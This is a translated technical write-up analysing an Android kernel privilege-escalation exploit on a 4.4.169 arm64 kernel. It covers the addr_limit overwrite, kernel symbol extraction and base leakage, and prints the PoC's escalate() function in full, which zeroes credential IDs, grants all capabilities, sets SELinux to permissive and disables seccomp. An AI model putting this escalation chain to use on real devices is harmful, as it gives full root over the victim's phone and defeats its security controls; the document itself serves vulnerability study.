//elixir.bootlin.com/linux/v5.5.19/source/arch/arm64/include/asm/thread_info.h#L26
struct thread_info {
    unsigned long     flags;      /* low level flags */
    mm_segment_t      addr_limit; /* address limit */
    #ifndef CONFIG_THREAD_INFO_IN_TASK
    struct task_struct    *task;      /* main task structure */
    #endif
    #ifdef CONFIG_ARM64_SW_TTBR0_PAN
    u64           ttbr0;      /* saved TTBR0_EL1 */
    #endif
    int           preempt_count;  /* 0 => preemptable, <0 => bug */
    #ifndef CONFIG_THREAD_INFO_IN_TASK
    int           cpu;        /* cpu */
    #endif
};
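
Why task_struct + 0x8 is the right target, and what the new limit changes, can be sketched as follows. `model_thread_info` mirrors only the first two fields shown above, and `model_access_ok` is a simplified range check in the spirit of access_ok, not the kernel's implementation; the user-space limit used with it in any example is an illustrative value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Mirror of the first two thread_info fields (arm64, 64-bit). */
struct model_thread_info {
    unsigned long flags;
    unsigned long addr_limit;   /* mm_segment_t is an unsigned long on arm64 */
};

/* Offset added to the leaked task_struct pointer to reach addr_limit,
 * given that thread_info is the first member of task_struct. */
size_t addr_limit_offset(void)
{
    return offsetof(struct model_thread_info, addr_limit);
}

/* Simplified model: the range [addr, addr + size) must lie at or below
 * the limit. Written to avoid overflow in addr + size. */
int model_access_ok(uint64_t addr, uint64_t size, uint64_t limit)
{
    return addr <= limit && size <= limit - addr;
}
```

With a user-space limit, a kernel address such as 0xffffff8008080000 fails the check; with the limit raised to 0xfffffffffffffffe it passes, which is what lets ordinary read and write calls reach kernel memory.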

(Figure: the overwrite process.)

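Modifying system attributes

Modifying data in kernel memory first requires the kernel base address and the kernel symbol information; the latter is used to compute offsets. The symbols can be extracted with tooling from the official image on googlesource, or dumped from a rooted phone of the same model and kernel version. The official-image route is used here.

Kernel symbol information

Following the method in the poc3.c write-up, the symbols are obtained as follows:

Google the test device's kernel version (4.4.169-gee9976dde895 here), find the wahoo-kernel repo in the results, and download the file Image.lz4-dtb (use the txt download at the bottom right, base64-decode it to get the original file, and remember to fix the extension)

Decompress the downloaded file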

$ lz4 -d Image.lz4-dtb Image
Stream followed by unrecognized data
Successfully decoded 37500928 bytes
$ strings Image | grep "Linux version"
Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019

Export the symbol table with droidimg. You may hit the error below, which occurs while locating the kallsyms table

$ ./vmlinux.py Image
Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019
[+]kallsyms_arch = arm64
[!]could be offset table...
[!]lookup_address_table error...
[!]get kallsyms error...

Repair the Image with the tool from droidimg

$ gcc -o fix_kaslr_arm64 fix_kaslr_arm64.c
fix_kaslr_arm64.c:269:5: warning: always_inline function might not be inlinable [-Wattributes]
 int main(int argc, char **argv)
     ^~~~
$ ./fix_kaslr_arm64 Image Image_kaslr
Original kernel: Image, output file: Image_kaslr
kern_buf @ 0x7f7eb403c000, mmap_size = 37502976
rela_start = 0xffffff8009916430
p->info = 0x0
rela_end = 0xffffff800a1b0340
375847 entries processed

Finally, export the symbol table

$ ./vmlinux.py Image_kaslr > syms.txt
Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019
[+]kallsyms_arch = arm64
[+]numsyms: 131300
[+]kallsyms_address_table = 0x11eb300
[+]kallsyms_num = 131300 (131300)
[+]kallsyms_name_table = 0x12ebc00
[+]kallsyms_type_table = 0x0
[+]kallsyms_marker_table = 0x14a4a00
[+]kallsyms_token_table = 0x14a5b00
[+]kallsyms_token_index_table = 0x14a5f00
[+]kallsyms_start_address = 0xffffff8008080000L
[+]found 9917 symbols in ksymta

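Compute offsets from the addresses in the exported symbol table and the base (kallsyms_start_address = 0xffffff8008080000L)

Kernel base address

With the symbol offsets in hand, the base is obtained by leaking the runtime address of some symbol and subtracting that symbol's offset from the symbol table.

poc2.c does this by reading the address in task_struct->mm->user_ns and subtracting the offset of init_user_ns.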
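
The base calculation is plain address arithmetic, sketched below. The function names are hypothetical; only `KALLSYMS_START` comes from the droidimg output above, and any symbol or leaked address passed in is whatever the reader has extracted for their own image.

```c
#include <assert.h>
#include <stdint.h>

/* Load address droidimg reported for the image. */
#define KALLSYMS_START UINT64_C(0xffffff8008080000)

/* Offset of a symbol from the start of the image, from syms.txt. */
uint64_t symbol_offset(uint64_t static_addr)
{
    return static_addr - KALLSYMS_START;
}

/* Runtime base = leaked runtime address of a symbol - that symbol's offset. */
uint64_t kernel_base_from_leak(uint64_t leaked_addr, uint64_t sym_offset)
{
    return leaked_addr - sym_offset;
}

/* Runtime address of any other symbol once the base is known. */
uint64_t runtime_addr(uint64_t kernel_base, uint64_t sym_offset)
{
    return kernel_base + sym_offset;
}
```

In poc2.c's approach the leaked address is the user_ns pointer and the offset is that of init_user_ns; every other symbol is then reachable through `runtime_addr`.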

Modifying the attribute

Locate the attribute at base + offset and overwrite it.

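Exploitation: privilege escalation

In poc3.c, the escalate function uses the kernel read/write obtained earlier to escalate privileges. Getting full root requires bypassing several Linux security mechanisms (only the kinds of mechanism are named here, without a detailed explanation of each), though with kernel read/write this is not especially hard. The privilege escalation code (DEBUG_RW prints extra information to aid understanding):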

void escalate()
{
  ......

  uid_t uid = getuid();
  unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);
  // offset 0x78 is pointer to void * security
  unsigned long current_cred_security = kernel_read_ulong(my_cred+0x78);

  printf("current->cred == 0x%lx\n", my_cred);

  printf("Starting as uid %u\n", uid);
  printf("Escalating...\n");

  // change IDs to root (there are eight)
  for (int i = 0; i < 8; i++)
    kernel_write_uint(my_cred+4 + i*4, 0);

  if (getuid() != 0) {
    printf("Something went wrong changing our UID to root!\n");
    exit(1);
  }

  printf("UIDs changed to root!\n");

  // reset securebits
  kernel_write_uint(my_cred+0x24, 0);

  // change capabilities to everything (perm, effective, bounding)
  for (int i = 0; i < 3; i++)
    kernel_write_ulong(my_cred+0x30 + i*8, 0x3fffffffffUL);

  printf("Capabilities set to ALL\n");

  // Grant: was checking for this earlier, but it's not set, so I moved on
  // printf("PR_GET_NO_NEW_PRIVS %d\n", prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0));

  unsigned int enforcing = kernel_read_uint(kernel_base + SYMBOL__selinux_enforcing);

  printf("SELinux status = %u\n", enforcing);

  if (enforcing) {
    printf("Setting SELinux to permissive\n");
    kernel_write_uint(kernel_base + SYMBOL__selinux_enforcing, 0);
  } else {
    printf("SELinux is already in permissive mode\n");
  }

  // Grant: We want to be as powerful as init, which includes mounting in the global namespace
  printf("Re-joining the init mount namespace...\n");
  int fd = open("/proc/1/ns/mnt", O_RDONLY);

  if (fd < 0) {
    perror("open");
    exit(1);
  }

  if (setns(fd, CLONE_NEWNS) < 0) {
    perror("setns");
    exit(1);
  }

  printf("Re-joining the init net namespace...\n");

  fd = open("/proc/1/ns/net", O_RDONLY);

  if (fd < 0) {
    perror("open");
    exit(1);
  }

  if (setns(fd, CLONE_NEWNET) < 0) {
    perror("setns");
    exit(1);
  }

  // Grant: SECCOMP isn't enabled when running the poc from ADB, only from app contexts
  if (prctl(PR_GET_SECCOMP) != 0) {
    printf("Disabling SECCOMP\n");

    // Grant: we need to clear TIF_SECCOMP from task first, otherwise, kernel WARN
    // clear the TIF_SECCOMP flag and everything else :P (feel free to modify this to just clear the single flag)
    // arch/arm64/include/asm/thread_info.h:#define TIF_SECCOMP 11
    kernel_write_ulong(current_ptr + OFFSET__task_struct__thread_info__flags, 0);
    kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa8, 0);
    kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa0, 0);

    if (prctl(PR_GET_SECCOMP) != 0) {
      printf("Failed to disable SECCOMP!\n");
      exit(1);
    } else {
      printf("SECCOMP disabled!\n");
    }
  } else {
    printf("SECCOMP is already disabled!\n");
  }

  // Grant: At this point, we are free from our jail (if all went well)
}

DAC

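Discretionary Access Control

While obtaining kernel read/write we got the pointer to task_struct. task_struct is the kernel's process descriptor and holds all kinds of information about a process. Its cred member is the struct that describes the process's credentials, defined as follows: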

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;        /* RCU deletion hook */
} __randomize_layout;

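escalate first reads the cred pointer from task_struct (current_ptr plus the offset of cred), then sets uid through fsgid in that struct to 0, making the process root. Although the process is now root, other Linux security mechanisms still stand between it and full control of the system, so further values are modified afterwards.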
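
The hard-coded offsets in escalate (4, 0x24, 0x30 and 0x78) can be cross-checked against the struct above with offsetof. The mirror below is a sketch with several assumptions: a 64-bit target, CONFIG_DEBUG_CREDENTIALS off, CONFIG_KEYS and CONFIG_SECURITY on, and kernel_cap_t as two 32-bit words. `model_cred` and the accessor functions are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

_Static_assert(sizeof(void *) == 8, "model assumes a 64-bit host");

typedef struct { uint32_t val; } kuid_t;
typedef struct { uint32_t val; } kgid_t;
typedef struct { uint32_t cap[2]; } kernel_cap_t;

/* Layout mirror only: pointer targets are left opaque. */
struct model_cred {
    int32_t usage;                    /* atomic_t */
    kuid_t uid;   kgid_t gid;
    kuid_t suid;  kgid_t sgid;
    kuid_t euid;  kgid_t egid;
    kuid_t fsuid; kgid_t fsgid;
    uint32_t securebits;
    kernel_cap_t cap_inheritable;
    kernel_cap_t cap_permitted;
    kernel_cap_t cap_effective;
    kernel_cap_t cap_bset;
    kernel_cap_t cap_ambient;
    unsigned char jit_keyring;
    void *session_keyring;
    void *process_keyring;
    void *thread_keyring;
    void *request_key_auth;
    void *security;
};

size_t cred_first_id_offset(void)      { return offsetof(struct model_cred, uid); }
size_t cred_securebits_offset(void)    { return offsetof(struct model_cred, securebits); }
size_t cred_cap_permitted_offset(void) { return offsetof(struct model_cred, cap_permitted); }
size_t cred_security_offset(void)      { return offsetof(struct model_cred, security); }
```

The eight 4-byte writes starting at offset 4 therefore cover exactly uid through fsgid. On a kernel built with different options the offsets would shift and would need to be recomputed.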

CAP

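Linux Capabilities

CAP corresponds to the kernel_cap_t members of cred. escalate writes 0x3fffffffff, a mask with bits 0 through 37 set, to three of them: cap_permitted, cap_effective and cap_bset.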
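
The constant 0x3fffffffff can be derived rather than memorized. The sketch below assumes the highest capability number on this kernel series is 37 (CAP_AUDIT_READ); `cap_full_mask` and `MODEL_CAP_LAST_CAP` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed highest capability number on the 4.4 series (CAP_AUDIT_READ). */
#define MODEL_CAP_LAST_CAP 37

/* Returns a mask with bits 0..last_cap set. */
uint64_t cap_full_mask(unsigned last_cap)
{
    if (last_cap >= 63)
        return UINT64_MAX;
    return (UINT64_C(1) << (last_cap + 1)) - 1;
}
```

`cap_full_mask(MODEL_CAP_LAST_CAP)` yields the value escalate writes; a kernel with more capabilities would need a wider mask.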

MAC

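Mandatory Access Control

Here MAC means SELinux.

The author of poc3 originally planned to modify the sid in the task_security_struct that cred's void *security points to, moving the process from the shell level to a more privileged one, for example sid=1. The PoC hung at that point and could not continue, so the author switched to another approach: patching kernel memory to set SELinux to permissive mode directly.

The address is derived from the offset of the selinux_enforcing symbol; writing 0 there switches SELinux to permissive.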

SECCOMP

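Secure computing mode: restricts which system calls a process may make

SECCOMP does not affect a PoC run from adb, but it blocks system calls made by a PoC bundled into an app.

In task_struct we find: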

struct seccomp {
    int mode;
    struct seccomp_filter *filter;
};

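mode takes one of two values, SECCOMP_MODE_STRICT and SECCOMP_MODE_FILTER, and a process normally runs in filter mode. When mode is 0, seccomp is disabled.

Writing 0 to mode alone does not disable SECCOMP, though. While SECCOMP is active, the TIF_SECCOMP flag is set in task_struct->thread_info.flags. If that flag is left untouched, the kernel still considers SECCOMP enabled and keeps calling __secure_computing, where mode 0 falls through to BUG(), so the original system call still does not run.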

int __secure_computing(const struct seccomp_data *sd)
{
    int mode = current->seccomp.mode;
......
    switch (mode) {
    case SECCOMP_MODE_STRICT:
        __secure_computing_strict(this_syscall);  /* may call do_exit */
        return 0;
    case SECCOMP_MODE_FILTER:
        return __seccomp_filter(this_syscall, sd, false);
    default:
        BUG();
    }
}

So both mode and flags have to be overwritten.
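
The interaction between the flag and the mode can be modelled in a few lines. This is a sketch, not kernel code: `model_syscall_entry` is a hypothetical summary of the behaviour described above, and `clear_tif_seccomp` shows the narrower alternative to zeroing the whole flags word that the PoC's own comment suggests. The bit number 11 is taken from the comment in escalate.

```c
#include <assert.h>
#include <stdint.h>

#define TIF_SECCOMP            11   /* bit number, per arch/arm64 thread_info.h */
#define MODEL_TIF_SECCOMP_MASK (UINT64_C(1) << TIF_SECCOMP)

enum { MODEL_SECCOMP_MODE_DISABLED = 0 };

/* Clears only the seccomp bit, leaving the other thread flags alone. */
uint64_t clear_tif_seccomp(uint64_t flags)
{
    return flags & ~MODEL_TIF_SECCOMP_MASK;
}

/* Returns 0 if the syscall runs unfiltered, 1 if seccomp is consulted,
 * and -1 for the BUG() case (flag still set but mode already zero). */
int model_syscall_entry(uint64_t flags, int mode)
{
    if (!(flags & MODEL_TIF_SECCOMP_MASK))
        return 0;   /* __secure_computing is never called */
    if (mode == MODEL_SECCOMP_MODE_DISABLED)
        return -1;  /* falls into the default: BUG() branch */
    return 1;
}
```

Only the combination of a cleared flag and a zero mode returns 0, which matches the order of the writes in escalate: flags first, then the seccomp fields.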

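At this point we have full root.

Summary

I don't have much experience analyzing vulnerabilities myself. Because exploiting this bug is not very complicated and it triggers almost reliably, I was able to follow the whole flow more or less end to end. Finally, thanks to ghost for the guidance.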

Source: http://xz.aliyun.com/t/9273